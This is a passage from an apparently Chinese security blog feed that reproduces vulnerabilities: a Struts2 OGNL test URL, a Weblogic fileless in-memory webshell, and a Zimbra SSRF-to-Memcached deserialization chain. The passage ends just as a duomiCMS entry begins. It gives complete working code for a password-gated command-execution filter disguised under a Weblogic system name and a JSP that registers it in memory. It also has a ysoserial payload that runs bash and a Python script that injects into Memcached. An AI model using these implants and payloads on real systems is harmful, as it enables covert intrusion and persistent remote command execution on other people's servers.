<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">struts</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">package</span> <span class="attr">name</span>=<span class="string">"actionchaining"</span> <span class="attr">extends</span>=<span class="string">"struts-default"</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">action</span> <span class="attr">name</span>=<span class="string">"actionChain1"</span> <span class="attr">class</span>=<span class="string">"org.apache.struts2.showcase.actionchaining.ActionChain1"</span>&gt;</span></span><br><span class="line">           <span class="tag">&lt;<span class="name">result</span> <span class="attr">type</span>=<span class="string">"redirectAction"</span>&gt;</span></span><br><span class="line">             <span class="tag">&lt;<span class="name">param</span> <span class="attr">name</span> = <span class="string">"actionName"</span>&gt;</span>register2<span class="tag">&lt;/<span class="name">param</span>&gt;</span></span><br><span class="line">           <span class="tag">&lt;/<span class="name">result</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">action</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">package</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">struts</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<h3 id="重启服务"><a class="header-anchor" href="#重启服务">¶</a>重启服务</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">cd</span> /usr/local/tomcat/bin/</span><br><span class="line">./shutdown.sh</span><br><span class="line"><span class="built_in">exit</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> vulhub/struts2/s2-048</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></tbody></table></figure>
<h2 id="0x03-验证"><a class="header-anchor" href="#0x03-验证">¶</a>0x03 验证</h2>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://192.168.1.59:8080/struts2-showcase/${(444+333)}/actionChain1.action</span><br></pre></td></tr></tbody></table></figure>
<p><img src="POC.png" alt="POC"></p>
<p>当前这个版本计算器弹不出，能弹出的版本就不测了，参考链接里有</p>
<h2 id="0x04-参考链接"><a class="header-anchor" href="#0x04-参考链接">¶</a>0x04 参考链接</h2>
<p><a href="http://www.freebuf.com/articles/system/180142.html">http://www.freebuf.com/articles/system/180142.html</a><br>
<a href="https://mp.weixin.qq.com/s?__biz=MzI2MTAxOTg1OQ==&amp;mid=2650049324&amp;idx=1&amp;sn=e5660c5720f17f0752e39ec0e533632c&amp;chksm=f260ea90c5176386a9346853df298cf926cd00f519bfde42c20d229444f6bd8552ca6b65449e&amp;mpshare=1&amp;scene=23&amp;srcid=0713GGhQHb4IUVNVYjUVZ5Oy#rd">https://mp.weixin.qq.com/s?__biz=MzI2MTAxOTg1OQ==&amp;mid=2650049324&amp;idx=1&amp;sn=e5660c5720f17f0752e39ec0e533632c&amp;chksm=f260ea90c5176386a9346853df298cf926cd00f519bfde42c20d229444f6bd8552ca6b65449e&amp;mpshare=1&amp;scene=23&amp;srcid=0713GGhQHb4IUVNVYjUVZ5Oy#rd</a><br>
<a href="https://github.com/jas502n/St2-057">https://github.com/jas502n/St2-057</a></p>
]]></content>
      <tags>
        <tag>CVE</tag>
        <tag>复现</tag>
        <tag>struts2</tag>
        <tag>docker</tag>
        <tag>vulhub</tag>
      </tags>
  </entry>
  <entry>
    <title>Weblogic - 无文件内存shell</title>
    <url>/2021/09/27/Weblogic-%E6%97%A0%E6%96%87%E4%BB%B6%E5%86%85%E5%AD%98shell/</url>
    <content><![CDATA[<h2 id="环境搭建"><a class="header-anchor" href="#环境搭建">¶</a>环境搭建</h2>
<p>采用<code>vulhub</code>中<code>weblogic</code> <code>CVE-2020-14882</code>搭建，<code>vulhub</code>安装不赘述</p>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">cd</span> vulhub/weblogic/CVE-<span class="number">2020</span>-<span class="number">14882</span>/</span><br><span class="line">sudo docker-compose up</span><br></pre></td></tr></tbody></table></figure>
<h2 id="内存cmd实现"><a class="header-anchor" href="#内存cmd实现">¶</a>内存<code>cmd</code>实现</h2>
<p>原理和机制感兴趣的可以去看参考链接，比较详细，我跳过（太菜，看不懂😭）</p>
<p>大致流程为：加载恶意类，动态注册<code>filter</code></p>
<h3 id="1-编写恶意filter类"><a class="header-anchor" href="#1-编写恶意filter类">¶</a>1. 编写恶意<code>filter</code>类</h3>
<div class="note info"><p>阅读本篇文章能了解到：weblogic, 内存马实现，冰蝎</p></div>
<span id="more"></span>
<p>把<code>kuron3k0</code>的<code>cmd</code>代码拿去编译，使用<code>vscode</code>，修复一下问题，编译，对<code>java</code>不熟，也是通过这次学习了很多<code>java</code>相关知识</p>
<p><code>vscode</code>中文件无红色报错，保存会自动编译到<code>output</code>，查看<code>Configure Classpath</code>即可找到路径，无需再手动<code>F5</code>编译，否则会提示找不到主类</p>
<p>源代码中会使网站所有访问被过滤，导致执行后网站会500，稍作修改</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.servlet.*;</span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line">   </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">cmdFilter</span> <span class="keyword">implements</span> <span class="title class_">Filter</span>{</span><br><span class="line">   </span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">init</span><span class="params">(FilterConfig filterConfig)</span> <span class="keyword">throws</span> ServletException {};</span><br><span class="line">   </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">doFilter</span><span class="params">(ServletRequest request, ServletResponse response, FilterChain chain)</span> <span class="keyword">throws</span> IOException, ServletException {</span><br><span class="line">   </span><br><span class="line">        System.out.println(<span class="string">"============== in evilfilter =============="</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">pwd</span> <span class="operator">=</span> request.getParameter(<span class="string">"pwd"</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> request.getParameter(<span class="string">"cmd"</span>);</span><br><span class="line">        <span class="keyword">if</span>(pwd!=<span class="literal">null</span> &amp;&amp; cmd!=<span class="literal">null</span>){</span><br><span class="line">            <span class="keyword">if</span>(pwd.equals(<span class="string">"redn3ck"</span>)) {</span><br><span class="line">                System.out.println(<span class="string">"============== running cmd =============="</span>);</span><br><span class="line">                <span class="type">String</span> <span class="variable">result</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(<span class="string">"\\A"</span>).next();</span><br><span class="line">                response.getOutputStream().println(result);</span><br><span class="line">                response.getOutputStream().flush();</span><br><span class="line">       </span><br><span class="line">            }<span class="keyword">else</span>{chain.doFilter(request, response);}</span><br><span class="line">        }</span><br><span class="line">        <span class="keyword">else</span>{chain.doFilter(request, response);}</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">destroy</span><span class="params">()</span> {</span><br><span class="line">        <span class="comment">// TODO Auto-generated method stub</span></span><br><span class="line">        </span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>编译完成后，把<code>class</code>文件转为<code>base64</code>，用<code>py</code>完成</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">toBase64</span>(<span class="params">file, txt</span>):</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(file, <span class="string">'rb'</span>) <span class="keyword">as</span> fileObj:</span><br><span class="line">        data = fileObj.read()</span><br><span class="line">        base64_data = base64.b64encode(data)</span><br><span class="line">        fout = <span class="built_in">open</span>(txt, <span class="string">'w'</span>)</span><br><span class="line">        fout.write(base64_data.decode())</span><br><span class="line">        fout.close()</span><br><span class="line"></span><br><span class="line">toBase64(<span class="string">r'C:\Users\Administrator\AppData\Roaming\Code\User\workspaceStorage\45d8f755763e840a79506c5be7b5e7b6\redhat.java\jdt_ws\cmd_7037b187\bin\cmdFilter.class'</span>, <span class="string">'out.txt'</span>)</span><br></pre></td></tr></tbody></table></figure>
<h3 id="2-加载恶意类-动态注册filter"><a class="header-anchor" href="#2-加载恶意类-动态注册filter">¶</a>2. 加载恶意类+动态注册<code>filter</code></h3>
<p>由于我们是<code>webshell</code>环境，肯定是执行<code>jsp</code>最为方便，所以使用<code>jsp</code>加载刚才生成的<code>base64</code>，并动态注册<code>filter</code></p>
<figure class="highlight jsp"><table><tbody><tr><td class="code"><pre><span class="line">&lt;%@ page language=<span class="string">"java"</span> <span class="keyword">import</span>=<span class="string">"java.util.*"</span> pageEncoding=<span class="string">"UTF-8"</span>%&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">"java.lang.reflect.Method"</span> %&gt;</span><br><span class="line">&lt;%@ taglib prefix=<span class="string">"c"</span> uri=<span class="string">"http://java.sun.com/jsp/jstl/core"</span> %&gt;</span><br><span class="line">&lt;%</span><br><span class="line">	<span class="type">byte</span>[] codeClass = java.util.Base64.getDecoder().decode(<span class="string">"yv66vgAAADQAfQcAAgEACWNtZEZpbHRlcg.."</span>);</span><br><span class="line">	<span class="type">ClassLoader</span> <span class="variable">cl</span> <span class="operator">=</span> (ClassLoader)Thread.currentThread().getContextClassLoader();</span><br><span class="line">	<span class="type">Method</span> <span class="variable">define</span> <span class="operator">=</span> cl.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod(<span class="string">"defineClass"</span>, <span class="type">byte</span>[].class, <span class="type">int</span>.class, <span class="type">int</span>.class);</span><br><span class="line">	define.setAccessible(<span class="literal">true</span>);</span><br><span class="line">	<span class="type">Class</span> <span class="variable">evilFilterClass</span>  <span class="operator">=</span> (Class)define.invoke(cl,codeClass,<span class="number">0</span>,codeClass.length);</span><br><span class="line"></span><br><span class="line"><span class="comment">//动态注册filter</span></span><br><span class="line"></span><br><span class="line">	<span class="type">String</span> <span class="variable">filterName</span> <span class="operator">=</span> <span class="string">"weblogic.work.SystemFilter.cmd"</span>;</span><br><span class="line"></span><br><span class="line">	java.lang.reflect.<span class="type">Field</span> <span class="variable">cachedClassesF</span> <span class="operator">=</span> cl.getClass().getDeclaredField(<span class="string">"cachedClasses"</span>);</span><br><span class="line">	cachedClassesF.setAccessible(<span class="literal">true</span>);</span><br><span class="line">	<span class="type">Object</span> <span class="variable">cachedClass</span> <span class="operator">=</span> cachedClassesF.get(cl);</span><br><span class="line">	java.lang.reflect.<span class="type">Method</span> <span class="variable">putM</span> <span class="operator">=</span> cachedClass.getClass().getDeclaredMethod(<span class="string">"put"</span>, Object.class, Object.class);</span><br><span class="line">	putM.invoke(cachedClass, filterName, evilFilterClass);</span><br><span class="line"></span><br><span class="line"><span class="comment">//获取context</span></span><br><span class="line">	Class&lt;?&gt; executeThread = Class.forName(<span class="string">"weblogic.work.ExecuteThread"</span>);</span><br><span class="line">	java.lang.reflect.<span class="type">Method</span> <span class="variable">m</span> <span class="operator">=</span> executeThread.getDeclaredMethod(<span class="string">"getCurrentWork"</span>);</span><br><span class="line">	<span class="type">Object</span> <span class="variable">currentWork</span> <span class="operator">=</span> m.invoke(Thread.currentThread());</span><br><span class="line"></span><br><span class="line">	java.lang.reflect.<span class="type">Field</span> <span class="variable">connectionHandlerF</span> <span class="operator">=</span> currentWork.getClass().getDeclaredField(<span class="string">"connectionHandler"</span>);</span><br><span class="line">	connectionHandlerF.setAccessible(<span class="literal">true</span>);</span><br><span class="line">	<span class="type">Object</span> <span class="variable">obj</span> <span class="operator">=</span> connectionHandlerF.get(currentWork);</span><br><span class="line"></span><br><span class="line">	java.lang.reflect.<span class="type">Field</span> <span class="variable">requestF</span> <span class="operator">=</span> obj.getClass().getDeclaredField(<span class="string">"request"</span>);</span><br><span class="line">	requestF.setAccessible(<span class="literal">true</span>);</span><br><span class="line">	obj = requestF.get(obj);</span><br><span class="line"></span><br><span class="line">	java.lang.reflect.<span class="type">Field</span> <span class="variable">contextF</span> <span class="operator">=</span> obj.getClass().getDeclaredField(<span class="string">"context"</span>);</span><br><span class="line">	contextF.setAccessible(<span class="literal">true</span>);</span><br><span class="line">	<span class="type">Object</span> <span class="variable">context</span> <span class="operator">=</span> contextF.get(obj);</span><br><span class="line"></span><br><span class="line"><span class="comment">//调用registerFilter注册</span></span><br><span class="line">	<span class="type">String</span> <span class="variable">evilName</span> <span class="operator">=</span> <span class="string">"weblogic.system.method.cmd"</span>;</span><br><span class="line"></span><br><span class="line">	java.lang.reflect.<span class="type">Method</span> <span class="variable">getFilterManagerM</span> <span class="operator">=</span> context.getClass().getDeclaredMethod(<span class="string">"getFilterManager"</span>);</span><br><span class="line">	<span class="type">Object</span> <span class="variable">filterManager</span> <span class="operator">=</span> getFilterManagerM.invoke(context);</span><br><span class="line"></span><br><span class="line">	java.lang.reflect.<span class="type">Method</span> <span class="variable">registerFilterM</span> <span class="operator">=</span> filterManager.getClass().getDeclaredMethod(<span class="string">"registerFilter"</span>, String.class, String.class, String[].class, String[].class, java.util.Map.class, String[].class);</span><br><span class="line">	registerFilterM.setAccessible(<span class="literal">true</span>);</span><br><span class="line">	registerFilterM.invoke(filterManager, evilName, filterName, <span class="keyword">new</span> <span class="title class_">String</span>[]{<span class="string">"/*"</span>}, <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line"></span><br><span class="line">%&gt;</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>
<div class="note warning">坑点：最后一行代码中`url`需要改为`new String[]{"/*"}`，意为对网站所有目录生效</div>
<p>把该<code>jsp</code>拿去网站目录访问即可执行</p>
<div class="note danger">注意：`jsp`在哪个目录执行，最终利用就在该目录</div>
<p>在其他目录利用会导致传参失败，该问题也是坑了很久</p>
<p>我在<code>/console/css/cmd.jsp</code>目录下执行，所以<code>/console/css/?pwd=redn3ck&amp;cmd=id</code></p>
<p><img src="cmd_ok.png" alt="cmd_ok"></p>
<h2 id="内存webshell实现"><a class="header-anchor" href="#内存webshell实现">¶</a>内存<code>webshell</code>实现</h2>
<p>原理一样，编译作者改好的冰蝎马，加载并注册即可</p>
<p>编译时<code>weblogic.servlet.internal.ServletRequestImpl</code>变红，没有这个库，去环境中把相关jar全部拿回</p>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line">sudo <span class="built_in">find</span> / -name weblogic.jar</span><br><span class="line">cp /var/lib/docker/overlay2/d13f05c242a61c2ec44aea486b84d94793ad7026d83a52be9d990378d22453ff/merged/u01/oracle/wlserver/server/lib/*.jar /tmp/jar/</span><br><span class="line">chmod <span class="number">777</span> /tmp/jar/</span><br></pre></td></tr></tbody></table></figure>
<p><code>vscode</code>配置<code>Configure Classpath</code>，选中所有<code>jar</code>，即可编译成功</p>
<p>执行<code>jsp</code>后使用冰蝎连接发现并不成功，查看终端<code>log</code></p>
<p><img src="behinder_error.png" alt="behinder_error"></p>
<p>提示第30行类型转换出错，遂将类型转换删除</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">//map.put("response", ((weblogic.servlet.internal.ServletRequestImpl)request).getResponse());</span></span><br><span class="line">map.put(<span class="string">"response"</span>, response);</span><br></pre></td></tr></tbody></table></figure>
<p>重新编译并执行，成功！</p>
<p><img src="behinder_ok.png" alt="behinder_ok"></p>
<div class="note warning">需要注意的是，两次注册的名字需要更改，否则会把之前注册的覆盖掉或者导致网站500</div>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">String</span> <span class="variable">filterName</span> <span class="operator">=</span> <span class="string">"weblogic.work.SystemFilter.behinder"</span>;</span><br><span class="line"><span class="type">String</span> <span class="variable">evilName</span> <span class="operator">=</span> <span class="string">"weblogic.system.method.behinder"</span>;</span><br></pre></td></tr></tbody></table></figure>
<h2 id="总结"><a class="header-anchor" href="#总结">¶</a>总结</h2>
<p>该方式可实现无文件<code>shell</code>，安全性大大提升，但由于是基于内存，重启服务器必然会消失</p>
<p>另外，<code>java</code>这块很薄弱，感谢宝哥对我的大力帮助！瑞思拜，不肉！</p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<blockquote>
<p><a href="https://kuron3k0.github.io/2021/04/23/weblogic-memshell-1/">https://kuron3k0.github.io/2021/04/23/weblogic-memshell-1/</a><br>
<a href="https://paper.seebug.org/1249/">https://paper.seebug.org/1249/</a></p>
</blockquote>
]]></content>
      <tags>
        <tag>vulhub</tag>
        <tag>weblogic</tag>
        <tag>java</tag>
        <tag>shell</tag>
        <tag>无文件</tag>
      </tags>
  </entry>
  <entry>
    <title>Zimbra - SSRF+Memcached+反序列化复现</title>
    <url>/2019/04/30/Zimbra-SSRF-Memcached-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%A4%8D%E7%8E%B0/</url>
    <content><![CDATA[<h2 id="环境搭建"><a class="header-anchor" href="#环境搭建">¶</a>环境搭建</h2>
<p>我就不搭建了，其实我按照作者给的搭建过程也没搭建成功，我直接使用一个现成环境测试。</p>
<h2 id="利用条件"><a class="header-anchor" href="#利用条件">¶</a>利用条件</h2>
<p>需要获取到3个变量</p>
<blockquote>
<p>zmImap:[accountId]:[folderNo]:[modseq]:[uidvalidity]</p>
</blockquote>
<div class="note info"><p>阅读本篇文章能了解到：<span class="label success">Zimbra</span>, <span class="label success">反序列化</span></p></div>
<span id="more"></span>
<p><code>accountId</code>：用户的<code>ID</code>，通过登陆zimbra获取<br>
<code>folderNo</code>：2，代表<code>inbox</code><br>
<code>modseq</code>和<code>uidvalidity</code>通过登陆imap获取</p>
<h2 id="步骤"><a class="header-anchor" href="#步骤">¶</a>步骤</h2>
<h3 id="1-设置zimbraMemcachedClientServerList"><a class="header-anchor" href="#1-设置zimbraMemcachedClientServerList">¶</a>1. 设置zimbraMemcachedClientServerList</h3>
<blockquote>
<p>Imap的<code>zimbraMemcachedClientServerList</code>默认为空，无法使用<code>ImapSession</code>的反序列化，所以需要自己命令行设置</p>
</blockquote>
<p>web环境当然没办法执行命令，根据作者的思考，<code>ModifyServer</code>可实现通过web修改。</p>
<figure class="highlight xml"><figcaption><span>ModifyConfigRequest</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">soap:Envelope</span> <span class="attr">xmlns:soap</span>=<span class="string">"http://www.w3.org/2003/05/soap-envelope"</span>&gt;</span><span class="tag">&lt;<span class="name">soap:Header</span>&gt;</span><span class="tag">&lt;<span class="name">context</span> <span class="attr">xmlns</span>=<span class="string">"urn:zimbra"</span>&gt;</span><span class="tag">&lt;<span class="name">userAgent</span> <span class="attr">xmlns</span>=<span class="string">""</span> <span class="attr">name</span>=<span class="string">"ZimbraWebClient - FF52 (Win)"</span>/&gt;</span><span class="tag">&lt;<span class="name">session</span> <span class="attr">xmlns</span>=<span class="string">""</span> <span class="attr">id</span>=<span class="string">"3129324"</span>/&gt;</span><span class="tag">&lt;<span class="name">format</span> <span class="attr">xmlns</span>=<span class="string">""</span> <span class="attr">type</span>=<span class="string">"js"</span>/&gt;</span><span class="tag">&lt;<span class="name">csrfToken</span> <span class="attr">xmlns</span>=<span class="string">""</span>&gt;</span>0_62c250d442e69ba3a624ac1bea96dac8648b86f6<span class="tag">&lt;/<span class="name">csrfToken</span>&gt;</span><span class="tag">&lt;/<span class="name">context</span>&gt;</span><span class="tag">&lt;/<span class="name">soap:Header</span>&gt;</span><span class="tag">&lt;<span class="name">soap:Body</span>&gt;</span><span class="tag">&lt;<span class="name">BatchRequest</span> <span class="attr">xmlns</span>=<span class="string">"urn:zimbra"</span> <span class="attr">onerror</span>=<span class="string">"stop"</span>&gt;</span><span class="tag">&lt;<span class="name">ModifyConfigRequest</span> <span class="attr">xmlns</span>=<span class="string">"urn:zimbraAdmin"</span>&gt;</span><span class="tag">&lt;<span class="name">a</span> <span class="attr">xmlns</span>=<span class="string">""</span> <span class="attr">n</span>=<span class="string">"zimbraMemcachedClientServerList"</span>&gt;</span>127.0.0.1<span class="tag">&lt;/<span class="name">a</span>&gt;</span><span class="tag">&lt;/<span class="name">ModifyConfigRequest</span>&gt;</span><span class="tag">&lt;/<span class="name">BatchRequest</span>&gt;</span><span class="tag">&lt;/<span class="name">soap:Body</span>&gt;</span><span class="tag">&lt;/<span class="name">soap:Envelope</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="list.jpg" alt="list"></p>
<p>可通过命令查看是否设置成功</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">/opt/zimbra/bin/zmprov gs `/opt/zimbra/bin/zmhostname` zimbraMemcachedClientServerList</span><br></pre></td></tr></tbody></table></figure>
<p><img src="listResult.jpg" alt="listResult"></p>
<h3 id="2-reload"><a class="header-anchor" href="#2-reload">¶</a>2. reload</h3>
<p>根据作者说法，reload后即可完成<code>Memcached</code>重载</p>
<figure class="highlight xml"><figcaption><span>ReloadMemcachedClientConfigRequest</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">soap:Envelope</span> <span class="attr">xmlns:soap</span>=<span class="string">"http://www.w3.org/2003/05/soap-envelope"</span>&gt;</span><span class="tag">&lt;<span class="name">soap:Header</span>&gt;</span><span class="tag">&lt;<span class="name">context</span> <span class="attr">xmlns</span>=<span class="string">"urn:zimbra"</span>&gt;</span><span class="tag">&lt;<span class="name">userAgent</span> <span class="attr">xmlns</span>=<span class="string">""</span> <span class="attr">name</span>=<span class="string">"ZimbraWebClient - FF52 (Win)"</span>/&gt;</span><span class="tag">&lt;<span class="name">session</span> <span class="attr">xmlns</span>=<span class="string">""</span> <span class="attr">id</span>=<span class="string">"3129324"</span>/&gt;</span><span class="tag">&lt;<span class="name">format</span> <span class="attr">xmlns</span>=<span class="string">""</span> <span class="attr">type</span>=<span class="string">"js"</span>/&gt;</span><span class="tag">&lt;<span class="name">csrfToken</span> <span class="attr">xmlns</span>=<span class="string">""</span>&gt;</span>0_62c250d442e69ba3a624ac1bea96dac8648b86f6<span class="tag">&lt;/<span class="name">csrfToken</span>&gt;</span><span class="tag">&lt;/<span class="name">context</span>&gt;</span><span class="tag">&lt;/<span class="name">soap:Header</span>&gt;</span><span class="tag">&lt;<span class="name">soap:Body</span>&gt;</span><span class="tag">&lt;<span class="name">BatchRequest</span> <span class="attr">xmlns</span>=<span class="string">"urn:zimbra"</span> <span class="attr">onerror</span>=<span class="string">"stop"</span>&gt;</span><span class="tag">&lt;<span class="name">ReloadMemcachedClientConfigRequest</span> <span class="attr">xmlns</span>=<span class="string">"urn:zimbraAdmin"</span>&gt;</span><span class="tag">&lt;/<span class="name">ReloadMemcachedClientConfigRequest</span>&gt;</span><span class="tag">&lt;/<span class="name">BatchRequest</span>&gt;</span><span class="tag">&lt;/<span class="name">soap:Body</span>&gt;</span><span class="tag">&lt;/<span class="name">soap:Envelope</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>web请求响应<code>reloadResponse</code>正常，证明reload成功</p>
<p><img src="reload.jpg" alt="reload"></p>
<p>但我实测发现并不行，需要<code>zmcontrol restart</code>，坑了很久，也就是说无法<code>reload</code>让zimbra重新加载<code>memcached</code>，到这一步就感觉鸡肋了，但也可能是我姿势有误。</p>
<h3 id="3-获取id"><a class="header-anchor" href="#3-获取id">¶</a>3. 获取id</h3>
<p>如果能<code>xxe</code>打到<code>localconfig.xml</code>，即拿到<code>ldap_password</code>，此时可通过管理账号创建一个新用户，无需登录即可得到<code>id</code>，如图所示</p>
<p><img src="creatAccount.jpg" alt="creatAccount"></p>
<p>若未能<code>xxe</code>，则只能通过其他手段（暴破等）获取一个用户账密</p>
<h3 id="4-获取modseq和uidvalidity"><a class="header-anchor" href="#4-获取modseq和uidvalidity">¶</a>4. 获取modseq和uidvalidity</h3>
<p>使用刚创建的用户登录imap，并<code>select inbox</code>获取；<br>
<code>imap</code>端口为<code>143</code>、<code>993</code>，<code>143</code>个别机器允许明文登录，大多数不可明文登录且有很多奇怪错误，故使用<code>993</code>加密登录</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">ncat --ssl [ip] 993</span><br><span class="line">axyz login <span class="built_in">test</span> test123456</span><br><span class="line">a <span class="keyword">select</span> inbox</span><br><span class="line">axyz <span class="built_in">logout</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="imap.jpg" alt="imap"></p>
<h3 id="5-生成payload"><a class="header-anchor" href="#5-生成payload">¶</a>5. 生成payload</h3>
<p>下载<a href="https://github.com/frohoff/ysoserial/">ysoserial</a>源码，此处作者没说清，需要修改<code>pom.xml</code>，将<code>1.7R2</code>改为<code>1.6R7</code>，然后重新打包，打包过程让同事帮忙完成。</p>
<p><code>echo justatest &gt; /tmp/justatest.txt</code></p>
<p>payload从这<a href="http://jackson-t.ca/runtime-exec-payloads.html">http://jackson-t.ca/runtime-exec-payloads.html</a>生成</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">java -jar ysoserial-0.0.6-SNAPSHOT-all.jar MozillaRhino2 "bash -c {echo,ZWNobyBqdXN0YXRlc3QgPiAvdG1wL2p1c3RhdGVzdC50eHQ=}|{base64,-d}|{bash,-i}" &gt; wakaka.obj</span><br></pre></td></tr></tbody></table></figure>
<h3 id="6-SSRF-to-Memcached"><a class="header-anchor" href="#6-SSRF-to-Memcached">¶</a>6. SSRF to Memcached</h3>
<p>使用作者给的请求脚本，修改上述获取的到3个值，和<code>adminToken</code>及域名，利用<code>ssrf</code>向<code>11211</code>发起请求</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line">accountid = <span class="string">"[2ebf42fc-d971-438c-8734-912f4ed90fa9]"</span> </span><br><span class="line">folderNo= <span class="number">2</span> </span><br><span class="line">modseq = [<span class="number">1</span>]</span><br><span class="line">uidvalidity = [<span class="number">1</span>]</span><br><span class="line">cacheKey =<span class="string">"zmImap:{accountId}:{folderNo}:{modseq}:{uidvalidity}"</span>.<span class="built_in">format</span>(accountId=accountid,folderNo=<span class="built_in">str</span>(folderNo),modseq=<span class="built_in">str</span>(modseq),uidvalidity=<span class="built_in">str</span>(uidvalidity)) </span><br><span class="line"><span class="built_in">print</span>(cacheKey) </span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">r"wakaka.obj"</span>,<span class="string">"rb"</span>) <span class="keyword">as</span> f: </span><br><span class="line">	payload = f.read() </span><br><span class="line">	</span><br><span class="line">set_command = <span class="string">b"set {cacheKey} 2048 3600 {payloadsize}\r\n"</span>.<span class="built_in">format</span>(cacheKey=cacheKey,payloadsize=<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))+payload+<span class="string">"\r\n"</span> </span><br><span class="line"></span><br><span class="line">headers = {<span class="string">"Cookie"</span>:<span class="string">"ZM_ADMIN_AUTH_TOKEN=[0_a371057a5246a4e62484dee80cc0733a6b2d10d2_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535363633363536323334373b61646d696e3d313a313b747970653d363a7a696d6272613b753d313a613b7469643d393a3136353638373835343b];"</span>, <span class="string">"host"</span>:<span class="string">"[domain.com]:7071"</span>} </span><br><span class="line">r = requests.post(<span class="string">"https://[domain.com]/service/proxy?target=http://127.0.0.1:11211"</span>,data=set_command,headers=headers,verify=<span class="literal">False</span>)</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>
<h3 id="7-触发反序列化"><a class="header-anchor" href="#7-触发反序列化">¶</a>7. 触发反序列化</h3>
<p>再次imap登陆同一账号并<code>select inbox</code></p>
<p>查看<code>/tmp</code>目录</p>
<p><img src="success.jpg" alt="success"></p>
<h2 id="总结"><a class="header-anchor" href="#总结">¶</a>总结</h2>
<ol>
<li>目标需开放<code>7071</code></li>
<li>能重启zimbra服务器，或<code>reload</code>成功完成加载</li>
</ol>
<p>这么一看，妈耶，好鸡肋<br>
但有朋友告诉我，条件允许的话，<code>7071</code>不开放也可行，若<code>7071</code>开放，还能通杀？包括<code>8.8.x</code>，也许他们研究出了<code>ssrf</code>带<code>cookie</code>的操作？<br>
好吧，研究不透，有研究的朋友可以交流一下。</p>
<p>另外说下原作者<code>fnmsd</code>，人超好，问问题回答的很详细，很有耐心，这篇整体的复现遇到很多坑，师傅也帮我各种解答，十分感谢！阿里嘎多！</p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<p><a href="https://blog.csdn.net/fnmsd/article/details/89235589">https://blog.csdn.net/fnmsd/article/details/89235589</a></p>
]]></content>
      <tags>
        <tag>Zimbra</tag>
        <tag>反序列化</tag>
      </tags>
  </entry>
  <entry>
    <title>duomiCMS</title>
    <url>/2016/11/01/duomiCMS/</url>
    <content><![CDATA[<h2 id="变量覆盖导致注入"><a class="header-anchor" href="#变量覆盖导致注入">¶</a>变量覆盖导致注入</h2>
<ol>
<li>
<p>漏洞页面：<code>\member\invitation.php</code></p>
